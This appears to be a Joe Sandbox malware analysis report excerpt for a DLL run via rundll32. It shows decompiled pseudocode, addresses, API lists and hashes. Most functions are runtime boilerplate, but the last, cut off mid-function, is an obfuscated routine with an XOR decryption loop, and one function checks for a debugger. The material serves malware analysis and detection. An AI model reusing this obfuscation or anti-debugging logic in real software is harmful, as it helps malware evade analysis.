				E00007FFC7FFC130EC440(__ecx, 0, _t52, __esp, _t5, __rdx, _t85, __r8);
				_t6 = _t90 + 0x10; // -1272
				r8d = 0x4d0;
				E00007FFC7FFC130EC440(_t45, 0, _t52, __esp, _t6, __rdx, _t85, __r8);
				_t7 = _t93 + 0x70; // 0x58
				 *((long long*)(_t93 + 0x48)) = _t7;
				_t10 = _t90 + 0x10; // -1272
				_t65 = _t10;
				 *((long long*)(_t93 + 0x50)) = _t65;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t65 == 0) goto 0x130ee446;
				 *(_t93 + 0x38) =  *(_t93 + 0x38) & 0x00000000;
				_t16 = _t93 + 0x60; // 0x48
				 *((long long*)(_t93 + 0x30)) = _t16;
				_t19 = _t93 + 0x58; // 0x40
				 *((long long*)(_t93 + 0x28)) = _t19;
				_t21 = _t90 + 0x10; // -1272
				 *((long long*)(_t93 + 0x20)) = _t21;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t90 + 0x108)) =  *((intOrPtr*)(_t90 + 0x508));
				_t25 = _t90 + 0x508; // 0x0
				 *((intOrPtr*)(_t93 + 0x70)) = __edx;
				 *((long long*)(_t90 + 0xa8)) = _t25 + 8;
				 *((long long*)(_t90 - 0x80)) =  *((intOrPtr*)(_t90 + 0x508));
				 *((intOrPtr*)(_t93 + 0x74)) = _t52;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t85, _t89);
				if (UnhandledExceptionFilter(_t99) != 0) goto 0x130ee4a8;
				if (_t40 != 0) goto 0x130ee4a8;
				if (_t44 == 0xffffffff) goto 0x130ee4a8;
				_t43 = E00007FFC7FFC130EBC04(_t42);
				E00007FFC7FFC130F6D80();
				return _t43;
			}

















                                0x7ffc130ee374
                                0x7ffc130ee374
                                0x7ffc130ee379
                                0x7ffc130ee382
                                0x7ffc130ee382
                                0x7ffc130ee38a
                                0x7ffc130ee391
                                0x7ffc130ee39b
                                0x7ffc130ee3a2
                                0x7ffc130ee3a7
                                0x7ffc130ee3ac
                                0x7ffc130ee3ae
                                0x7ffc130ee3b5
                                0x7ffc130ee3ba
                                0x7ffc130ee3c0
                                0x7ffc130ee3c7
                                0x7ffc130ee3cb
                                0x7ffc130ee3d1
                                0x7ffc130ee3d6
                                0x7ffc130ee3db
                                0x7ffc130ee3e4
                                0x7ffc130ee3e4
                                0x7ffc130ee3e8
                                0x7ffc130ee3ed
                                0x7ffc130ee402
                                0x7ffc130ee405
                                0x7ffc130ee40e
                                0x7ffc130ee410
                                0x7ffc130ee416
                                0x7ffc130ee423
                                0x7ffc130ee42b
                                0x7ffc130ee430
                                0x7ffc130ee435
                                0x7ffc130ee439
                                0x7ffc130ee440
                                0x7ffc130ee44d
                                0x7ffc130ee454
                                0x7ffc130ee45f
                                0x7ffc130ee463
                                0x7ffc130ee471
                                0x7ffc130ee475
                                0x7ffc130ee479
                                0x7ffc130ee483
                                0x7ffc130ee496
                                0x7ffc130ee49a
                                0x7ffc130ee49f
                                0x7ffc130ee4a3
                                0x7ffc130ee4b2
                                0x7ffc130ee4ce

                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                • String ID:
                                • API String ID: 1239891234-0
                                • Opcode ID: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction ID: b8fa9b1c3342f5cd195a218d8db54b39ca3dff7b40b19d0f41d7a57df183d9ef
                                • Opcode Fuzzy Hash: 07dcb6749cf727804a818c63ef9eb218394f6ec07e419224f6cd5021fde535cb
                                • Instruction Fuzzy Hash: EE316E36708F9586EB60CF25E8442AE73A4FB88768F500535EA9D53B98DF3CC565CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF964 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00007FFC7FFC130EF964(void* __edx, intOrPtr* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, long long _a8, void* _a16, long long _a24, intOrPtr _a26, long long _a32) {
				long long _v72;
				intOrPtr _v80;
				void* _v88;
				long long _v96;
				long long _v104;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t33;
				void* _t37;
				intOrPtr* _t66;
				signed long long _t68;
				long long _t70;
				long long _t72;
				long long _t78;
				void* _t83;
				void* _t90;
				long long _t104;
				long long _t108;
				void* _t110;
				intOrPtr* _t112;
				void* _t114;
				void* _t117;
				intOrPtr _t129;
				void* _t131;
				void* _t132;
				signed long long _t133;
				signed long long _t134;
				signed long long _t137;
				intOrPtr* _t138;

				_t66 = __rax;
				_a8 = __rbx;
				_a16 = __rdx;
				if (__rdx != 0) goto 0x130ef9a0;
				_t33 = E00007FFC7FFC130EE6A0(__rax);
				_t3 = _t108 + 0x16; // 0x16
				 *__rax = _t3;
				E00007FFC7FFC130EE580(_t33);
				goto 0x130efb40;
				asm("xorps xmm0, xmm0");
				 *((long long*)(__rdx)) = _t108;
				asm("movdqu [ebp-0x20], xmm0");
				_v72 = _t108;
				if ( *__rcx == _t108) goto 0x130efa0b;
				_a24 = 0x3f2a;
				_a26 = dil;
				E00007FFC7FFC130F3218( *__rcx,  &_a24);
				if (_t66 != 0) goto 0x130ef9e2;
				r8d = 0;
				_t37 = E00007FFC7FFC130EFB70(__rcx,  *__rcx,  &_a24, _t108, _t110, _t114, _t117,  &_v88);
				goto 0x130ef9ee;
				0x130efc80();
				r14d = _t37;
				if (_t37 != 0) goto 0x130ef9fe;
				goto 0x130ef9b2;
				goto 0x130efb04;
				_t112 = _v88;
				_t129 = _v80;
				_a24 = _t108;
				_t68 = _t129 - _t112;
				_t137 = (_t68 >> 3) + 1;
				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
				_t134 = _t133 | 0xffffffff;
				if (_t90 == 0) goto 0x130efa6d;
				_t70 = _t134 + 1;
				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x130efa4e;
				if (_t108 + 1 != _t90) goto 0x130efa48;
				_a24 = _t108 + 1 + _t70;
				r8d = 1;
				E00007FFC7FFC130ED6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
				_t78 = _t70;
				if (_t70 == 0) goto 0x130efafd;
				_t104 = _t70 + _t137 * 8;
				_t138 = _t112;
				_v96 = _t104;
				_a32 = _t104;
				if (_t112 == _t129) goto 0x130efaf3;
				_v104 = _t78 - _t112;
				_t131 = _t134 + 1;
				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
				_t132 = _t131 + 1;
				if (E00007FFC7FFC130F3144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x130efb58;
				_t72 = _a32;
				 *((long long*)(_v104 + _t138)) = _t72;
				_a32 = _t72 + _t132;
				if (_t138 + 8 != _t129) goto 0x130efaa7;
				r14d = 0;
				 *_a16 = _t78;
				E00007FFC7FFC130EE114(_a16, _v104);
				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
				if (_t83 == 0) goto 0x130efb35;
				E00007FFC7FFC130EE114(_a16,  *_t112);
				if (_t108 + 1 != _t83) goto 0x130efb21;
				E00007FFC7FFC130EE114(_a16, _t112);
				return r14d;
			}

































                                0x7ffc130ef964
                                0x7ffc130ef964
                                0x7ffc130ef969
                                0x7ffc130ef988
                                0x7ffc130ef98a
                                0x7ffc130ef98f
                                0x7ffc130ef992
                                0x7ffc130ef994
                                0x7ffc130ef99b
                                0x7ffc130ef9a0
                                0x7ffc130ef9a3
                                0x7ffc130ef9a9
                                0x7ffc130ef9ae
                                0x7ffc130ef9b2
                                0x7ffc130ef9bb
                                0x7ffc130ef9c1
                                0x7ffc130ef9c5
                                0x7ffc130ef9d0
                                0x7ffc130ef9d6
                                0x7ffc130ef9db
                                0x7ffc130ef9e0
                                0x7ffc130ef9e9
                                0x7ffc130ef9ee
                                0x7ffc130ef9f3
                                0x7ffc130ef9fc
                                0x7ffc130efa06
                                0x7ffc130efa0b
                                0x7ffc130efa12
                                0x7ffc130efa1c
                                0x7ffc130efa20
                                0x7ffc130efa2d
                                0x7ffc130efa3b
                                0x7ffc130efa3f
                                0x7ffc130efa46
                                0x7ffc130efa4e
                                0x7ffc130efa55
                                0x7ffc130efa67
                                0x7ffc130efa69
                                0x7ffc130efa6d
                                0x7ffc130efa79
                                0x7ffc130efa7e
                                0x7ffc130efa84
                                0x7ffc130efa86
                                0x7ffc130efa8a
                                0x7ffc130efa8d
                                0x7ffc130efa94
                                0x7ffc130efa9b
                                0x7ffc130efaa3
                                0x7ffc130efaad
                                0x7ffc130efab4
                                0x7ffc130efab9
                                0x7ffc130efacd
                                0x7ffc130efad3
                                0x7ffc130efadf
                                0x7ffc130efaea
                                0x7ffc130efaf1
                                0x7ffc130efaf7
                                0x7ffc130efafa
                                0x7ffc130efaff
                                0x7ffc130efb18
                                0x7ffc130efb1f
                                0x7ffc130efb24
                                0x7ffc130efb33
                                0x7ffc130efb38
                                0x7ffc130efb57

                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EE9E0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 197COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 298 7ffc130ee9e0-7ffc130eea10 299 7ffc130eea1a-7ffc130eea1d 298->299 300 7ffc130eea12-7ffc130eea18 298->300 301 7ffc130eea40 299->301 302 7ffc130eea1f-7ffc130eea22 299->302 300->299 300->300 303 7ffc130eea46 301->303 304 7ffc130eea24-7ffc130eea27 302->304 305 7ffc130eea35-7ffc130eea3e 302->305 306 7ffc130eea4d-7ffc130eea5c 303->306 307 7ffc130eec5d-7ffc130eec68 call 7ffc130ee6a0 call 7ffc130ee580 304->307 308 7ffc130eea2d-7ffc130eea33 304->308 305->306 309 7ffc130eea5e-7ffc130eea61 306->309 323 7ffc130eec6d-7ffc130eec7a 307->323 308->303 311 7ffc130eeb8b-7ffc130eeb8e 309->311 312 7ffc130eea67-7ffc130eea6d 309->312 317 7ffc130eeb93-7ffc130eeb96 311->317 318 7ffc130eeb90 311->318 314 7ffc130eea73 312->314 315 7ffc130eeb0c-7ffc130eeb0f 312->315 319 7ffc130eea79-7ffc130eea7c 314->319 320 7ffc130eeafc-7ffc130eeaff 314->320 321 7ffc130eeb65-7ffc130eeb6b 315->321 322 7ffc130eeb11-7ffc130eeb14 315->322 317->318 324 7ffc130eeb98-7ffc130eeb9b 317->324 318->317 329 7ffc130eeb79-7ffc130eeb85 319->329 330 7ffc130eea82-7ffc130eea85 319->330 327 7ffc130eeb01 320->327 328 7ffc130eeb6d-7ffc130eeb6f 320->328 321->328 331 7ffc130eeb71 321->331 332 7ffc130eeb56-7ffc130eeb5d 322->332 333 7ffc130eeb16-7ffc130eeb19 322->333 325 7ffc130eebaf-7ffc130eebc6 call 7ffc130f1b40 324->325 326 7ffc130eeb9d-7ffc130eeba0 324->326 325->307 354 7ffc130eebcc-7ffc130eebd0 325->354 326->307 334 7ffc130eeba6-7ffc130eebaa 326->334 337 7ffc130eeb04-7ffc130eeb0a 327->337 328->329 329->309 329->311 338 7ffc130eea87-7ffc130eea8a 330->338 339 7ffc130eead0-7ffc130eead3 330->339 340 7ffc130eeb75 331->340 332->328 336 7ffc130eeb5f-7ffc130eeb63 332->336 341 7ffc130eeb1b-7ffc130eeb1e 333->341 342 7ffc130eeb44-7ffc130eeb47 333->342 334->323 336->340 337->329 346 7ffc130eeac8-7ffc130eeacb 338->346 347 7ffc130eea8c-7ffc130eea8f 338->347 339->328 344 7ffc130eead9-7ffc130eeae0 339->344 348 7ffc130eeb77 340->348 349 7ffc130eeb38-7ffc130eeb3b 341->349 350 7ffc130eeb20-7ffc130eeb23 341->350 342->328 343 7ffc130eeb49 342->343 352 7ffc130eeb4e-7ffc130eeb54 343->352 344->328 353 7ffc130eeae6-7ffc130eeafa 344->353 346->328 355 7ffc130eeab6-7ffc130eeaba 347->355 356 7ffc130eea91-7ffc130eea94 347->356 348->329 349->328 351 7ffc130eeb3d-7ffc130eeb42 349->351 350->307 357 7ffc130eeb29-7ffc130eeb30 350->357 351->352 352->329 353->348 359 7ffc130eebd5-7ffc130eebd8 354->359 355->328 358 7ffc130eeac0-7ffc130eeac3 355->358 360 7ffc130eea96-7ffc130eea99 356->360 361 7ffc130eeaad-7ffc130eeab1 356->361 357->328 362 7ffc130eeb32-7ffc130eeb36 357->362 358->340 363 7ffc130eebda-7ffc130eebdd 359->363 364 7ffc130eebd2 359->364 360->307 365 7ffc130eea9f-7ffc130eeaa2 360->365 361->348 362->340 363->307 366 7ffc130eebdf-7ffc130eebe5 363->366 364->359 365->328 367 7ffc130eeaa8-7ffc130eeaab 365->367 366->366 368 7ffc130eebe7-7ffc130eebfe call 7ffc130f1c08 366->368 367->337 371 7ffc130eec0a-7ffc130eec21 call 7ffc130f1c08 368->371 372 7ffc130eec00-7ffc130eec08 368->372 378 7ffc130eec23-7ffc130eec2b 371->378 379 7ffc130eec2d-7ffc130eec44 call 7ffc130f1c08 371->379 373 7ffc130eec53-7ffc130eec56 372->373 376 7ffc130eec58 373->376 377 7ffc130eec50 373->377 376->326 377->373 378->373 379->307 382 7ffc130eec46-7ffc130eec4e 379->382 382->373
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
				long long _v24;
				signed int _t21;
				signed int _t24;
				void* _t39;
				char _t42;
				void* _t47;
				void* _t63;
				signed int _t69;
				signed int _t74;
				intOrPtr* _t89;
				char* _t93;
				char* _t94;
				char* _t96;
				char* _t98;
				char* _t99;
				void* _t100;
				void* _t101;
				void* _t119;

				_t89 = __rax;
				_a8 = __rbx;
				_t21 =  *0x13124dc8; // 0x0
				_v24 = __rcx;
				asm("movsd xmm0, [esp+0x20]");
				asm("movsd [edi], xmm0");
				__rcx[2] = 0;
				__rcx[1] = _t21;
				if ( *__rdx != 0x20) goto 0x130eea1a;
				_t93 = __rdx + 1;
				if ( *_t93 == 0x20) goto 0x130eea12;
				if ( *_t93 == 0x61) goto 0x130eea40;
				if ( *_t93 == 0x72) goto 0x130eea35;
				if ( *_t93 != 0x77) goto 0x130eec5d;
				 *__rcx = 0x301;
				goto 0x130eea46;
				 *__rcx =  *__rcx & 0;
				__rcx[1] = 1;
				goto 0x130eea4d;
				 *__rcx = 0x109;
				__rcx[1] = 2;
				_t94 = _t93 + 1;
				r9b = 0;
				r11b = 0;
				r10b = 0;
				r8b = 0;
				if ( *_t94 == 0) goto 0x130eeb8b;
				_t42 =  *_t94;
				_t63 = _t42 - 0x53;
				if (_t63 > 0) goto 0x130eeb0c;
				if (_t63 == 0) goto 0x130eeafc;
				if (_t63 == 0) goto 0x130eeb79;
				if (_t63 == 0) goto 0x130eead0;
				if (_t63 == 0) goto 0x130eeac8;
				if (_t63 == 0) goto 0x130eeab6;
				_t47 = _t42 - 0xfffffffffffffff2;
				if (_t63 == 0) goto 0x130eeaad;
				if (_t47 != 4) goto 0x130eec5d;
				if (r10b != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000010;
				goto 0x130eeb04;
				asm("bts dword [edi], 0x7");
				goto 0x130eeb77;
				if (( *__rcx & 0x00000040) != 0) goto 0x130eeb6d;
				goto 0x130eeb75;
				r8b = 1;
				goto 0x130eeb6d;
				if (r11b != 0) goto 0x130eeb6d;
				_t24 =  *__rcx;
				r11b = 1;
				if ((_t24 & 0x00000002) != 0) goto 0x130eeb6d;
				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
				goto 0x130eeb77;
				_t69 = r10b;
				if (_t69 != 0) goto 0x130eeb6d;
				 *__rcx =  *__rcx | 0x00000020;
				r10b = 1;
				goto 0x130eeb79;
				if (_t69 == 0) goto 0x130eeb65;
				if (_t69 == 0) goto 0x130eeb56;
				if (_t69 == 0) goto 0x130eeb44;
				if (_t69 == 0) goto 0x130eeb38;
				if (_t47 - 0x3a != 6) goto 0x130eec5d;
				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
				asm("bts eax, 0xe");
				goto 0x130eeb75;
				if (r9b != 0) goto 0x130eeb6d;
				asm("btr dword [edi+0x4], 0xb");
				goto 0x130eeb4e;
				if (r9b != 0) goto 0x130eeb6d;
				asm("bts dword [edi+0x4], 0xb");
				r9b = 1;
				goto 0x130eeb79;
				_t74 =  *__rcx & 0x0000c000;
				if (_t74 != 0) goto 0x130eeb6d;
				asm("bts eax, 0xf");
				goto 0x130eeb75;
				asm("bt eax, 0xc");
				if (_t74 >= 0) goto 0x130eeb71;
				goto 0x130eeb79;
				asm("bts eax, 0xc");
				if (1 != 0) goto 0x130eea5e;
				if (r8b == 0) goto 0x130eeb93;
				_t96 = _t94 + __rax + 1;
				if ( *_t96 == 0x20) goto 0x130eeb90;
				if (r8b != 0) goto 0x130eebaf;
				if ( *_t96 != 0) goto 0x130eec5d;
				__rcx[2] = 1;
				goto 0x130eec6d;
				r8d = 3;
				if (E00007FFC7FFC130F1B40(_t47 - 0x3a, _t96, 0x1310ed38, _t119) != 0) goto 0x130eec5d;
				goto 0x130eebd5;
				_t98 = _t96 + 4;
				if ( *_t98 == 0x20) goto 0x130eebd2;
				if ( *_t98 != 0x3d) goto 0x130eec5d;
				_t99 = _t98 + 1;
				if ( *_t99 == 0x20) goto 0x130eebdf;
				r8d = 5;
				if (E00007FFC7FFC130F1C08(1, _t89, _t99) != 0) goto 0x130eec0a;
				_t100 = _t99 + 5;
				asm("bts dword [edi], 0x12");
				goto 0x130eec53;
				r8d = 8;
				if (E00007FFC7FFC130F1C08(1, _t89, _t100) != 0) goto 0x130eec2d;
				_t101 = _t100 + 8;
				asm("bts dword [edi], 0x11");
				goto 0x130eec53;
				r8d = 7;
				if (E00007FFC7FFC130F1C08(1, _t89, _t101) != 0) goto 0x130eec5d;
				asm("bts dword [edi], 0x10");
				goto 0x130eec53;
				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x130eec50;
				goto 0x130eeb9d;
				_t39 = E00007FFC7FFC130EE6A0(_t89);
				 *_t89 = 0x16;
				return E00007FFC7FFC130EE580(_t39);
			}





















                                0x7ffc130ee9e0
                                0x7ffc130ee9e0
                                0x7ffc130ee9ea
                                0x7ffc130ee9fb
                                0x7ffc130eea00
                                0x7ffc130eea06
                                0x7ffc130eea0a
                                0x7ffc130eea0d
                                0x7ffc130eea10
                                0x7ffc130eea12
                                0x7ffc130eea18
                                0x7ffc130eea1d
                                0x7ffc130eea22
                                0x7ffc130eea27
                                0x7ffc130eea2d
                                0x7ffc130eea33
                                0x7ffc130eea35
                                0x7ffc130eea37
                                0x7ffc130eea3e
                                0x7ffc130eea40
                                0x7ffc130eea46
                                0x7ffc130eea4d
                                0x7ffc130eea50
                                0x7ffc130eea53
                                0x7ffc130eea56
                                0x7ffc130eea59
                                0x7ffc130eea61
                                0x7ffc130eea67
                                0x7ffc130eea6a
                                0x7ffc130eea6d
                                0x7ffc130eea73
                                0x7ffc130eea7c
                                0x7ffc130eea85
                                0x7ffc130eea8a
                                0x7ffc130eea8f
                                0x7ffc130eea91
                                0x7ffc130eea94
                                0x7ffc130eea99
                                0x7ffc130eeaa2
                                0x7ffc130eeaa8
                                0x7ffc130eeaab
                                0x7ffc130eeaad
                                0x7ffc130eeab1
                                0x7ffc130eeaba
                                0x7ffc130eeac3
                                0x7ffc130eeac8
                                0x7ffc130eeacb
                                0x7ffc130eead3
                                0x7ffc130eead9
                                0x7ffc130eeadb
                                0x7ffc130eeae0
                                0x7ffc130eeaec
                                0x7ffc130eeaf7
                                0x7ffc130eeafa
                                0x7ffc130eeafc
                                0x7ffc130eeaff
                                0x7ffc130eeb01
                                0x7ffc130eeb04
                                0x7ffc130eeb0a
                                0x7ffc130eeb0f
                                0x7ffc130eeb14
                                0x7ffc130eeb19
                                0x7ffc130eeb1e
                                0x7ffc130eeb23
                                0x7ffc130eeb30
                                0x7ffc130eeb32
                                0x7ffc130eeb36
                                0x7ffc130eeb3b
                                0x7ffc130eeb3d
                                0x7ffc130eeb42
                                0x7ffc130eeb47
                                0x7ffc130eeb49
                                0x7ffc130eeb4e
                                0x7ffc130eeb54
                                0x7ffc130eeb58
                                0x7ffc130eeb5d
                                0x7ffc130eeb5f
                                0x7ffc130eeb63
                                0x7ffc130eeb67
                                0x7ffc130eeb6b
                                0x7ffc130eeb6f
                                0x7ffc130eeb71
                                0x7ffc130eeb85
                                0x7ffc130eeb8e
                                0x7ffc130eeb90
                                0x7ffc130eeb96
                                0x7ffc130eeb9b
                                0x7ffc130eeba0
                                0x7ffc130eeba6
                                0x7ffc130eebaa
                                0x7ffc130eebaf
                                0x7ffc130eebc6
                                0x7ffc130eebd0
                                0x7ffc130eebd2
                                0x7ffc130eebd8
                                0x7ffc130eebdd
                                0x7ffc130eebdf
                                0x7ffc130eebe5
                                0x7ffc130eebe7
                                0x7ffc130eebfe
                                0x7ffc130eec00
                                0x7ffc130eec04
                                0x7ffc130eec08
                                0x7ffc130eec0a
                                0x7ffc130eec21
                                0x7ffc130eec23
                                0x7ffc130eec27
                                0x7ffc130eec2b
                                0x7ffc130eec2d
                                0x7ffc130eec44
                                0x7ffc130eec4a
                                0x7ffc130eec4e
                                0x7ffc130eec56
                                0x7ffc130eec58
                                0x7ffc130eec5d
                                0x7ffc130eec62
                                0x7ffc130eec7a

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E2380 Relevance: 17.9, APIs: 4, Strings: 6, Instructions: 434memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E00007FFC7FFC130E2380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
				void* __rsi;
				signed int _t119;
				signed int _t160;
				void* _t163;
				signed int _t172;
				signed long long _t180;
				signed long long _t200;
				signed long long _t201;
				void* _t202;
				void* _t204;
				long long _t206;
				void* _t208;
				void* _t209;
				void* _t219;
				void* _t223;
				void* _t225;
				void* _t227;

				_t172 = __rax;
				goto 0x13101440;
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t219 = _t208;
				 *((long long*)(_t219 + 0x18)) = __rbx;
				 *((long long*)(_t219 + 0x20)) = _t206;
				_push(_t204);
				_t209 = _t208 - 0x60;
				r13d = __r9 + 0x6ab;
				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
				r14d = __rcx + 0x37e1;
				r15d = __rdx + 0x1249;
				r14d =  <  ? __r9 - 0x2103 : r14d;
				if (r15d - _t206 + 0x3a59 > 0) goto 0x130e2709;
				 *((long long*)(_t219 + 8)) = __r12;
				_t163 = r14d - _t227 + 0x108;
				if (_t163 > 0) goto 0x130e25c8;
				 *((long long*)(_t219 - 0x60)) = 0x2032;
				r12d = 0x3189;
				 *(_t209 + 0x20) = 0x3595;
				r8d = r12d;
				r9d = 0x1f2c;
				E00007FFC7FFC130E9AC0(__r8, __rcx, __r8, _t206, _t227);
				r11d = _t202 + 0x19d;
				 *(_t209 + 0x50) = __r8;
				r10d = _t225 - 0x1033;
				__r8[0x22] = _t172;
				 *(_t209 + 0x48) = _t223 - 0x3b8;
				_t160 = __rcx - 0x114f;
				 *(_t209 + 0x40) = r10d;
				r8d = __rcx - 0x2ad;
				 *(_t209 + 0x38) = r11d;
				r9d = _t225 - 0x16de;
				 *(_t209 + 0x30) = _t206 + 0x36e7;
				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
				 *(_t209 + 0x20) = _t160;
				E00007FFC7FFC130FF160(_t172, __r8, __r8, _t225, _t223, _t202);
				r8d = 0;
				if (_t163 == 0) goto 0x130e2589;
				r9d = r8d;
				asm("o16 nop [eax+eax]");
				_t200 = __r8[0x90];
				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
				if (__r8[0x78] != __r8[0xc]) goto 0x130e2568;
				__r8[0x32] = __r8[0x32] + 0xffffdfce;
				r8d = r8d + 1;
				_t180 = r8d;
				if (_t180 - _t200 < 0) goto 0x130e24f0;
				__r8[0x66] = __r8[0x66] | 0x0a01b449;
				_t119 = __r8[0x4c] ^ 0x0000127e;
				if (_t119 - r12d >= 0) goto 0x130e25b8;
				r12d = r12d - _t119;
				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
				__r8[0x56] = __r8[0x14];
				goto 0x130e2701;
				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x130e2624;
				_t201 = _t200 | __r8[0x2a];
				if (__r8[0x2e] - _t201 > 0) goto 0x130e2624;
				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x130e2610;
				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x130e26ed;
				r10d = _t160;
				r11d = __r8[0x78];
				r15d = r15d - (__r8[6] ^ r15d);
				r11d = r11d - __r8[0x74];
				r11d = r11d + __r8[0x24];
				r14d = r14d *  *__r8;
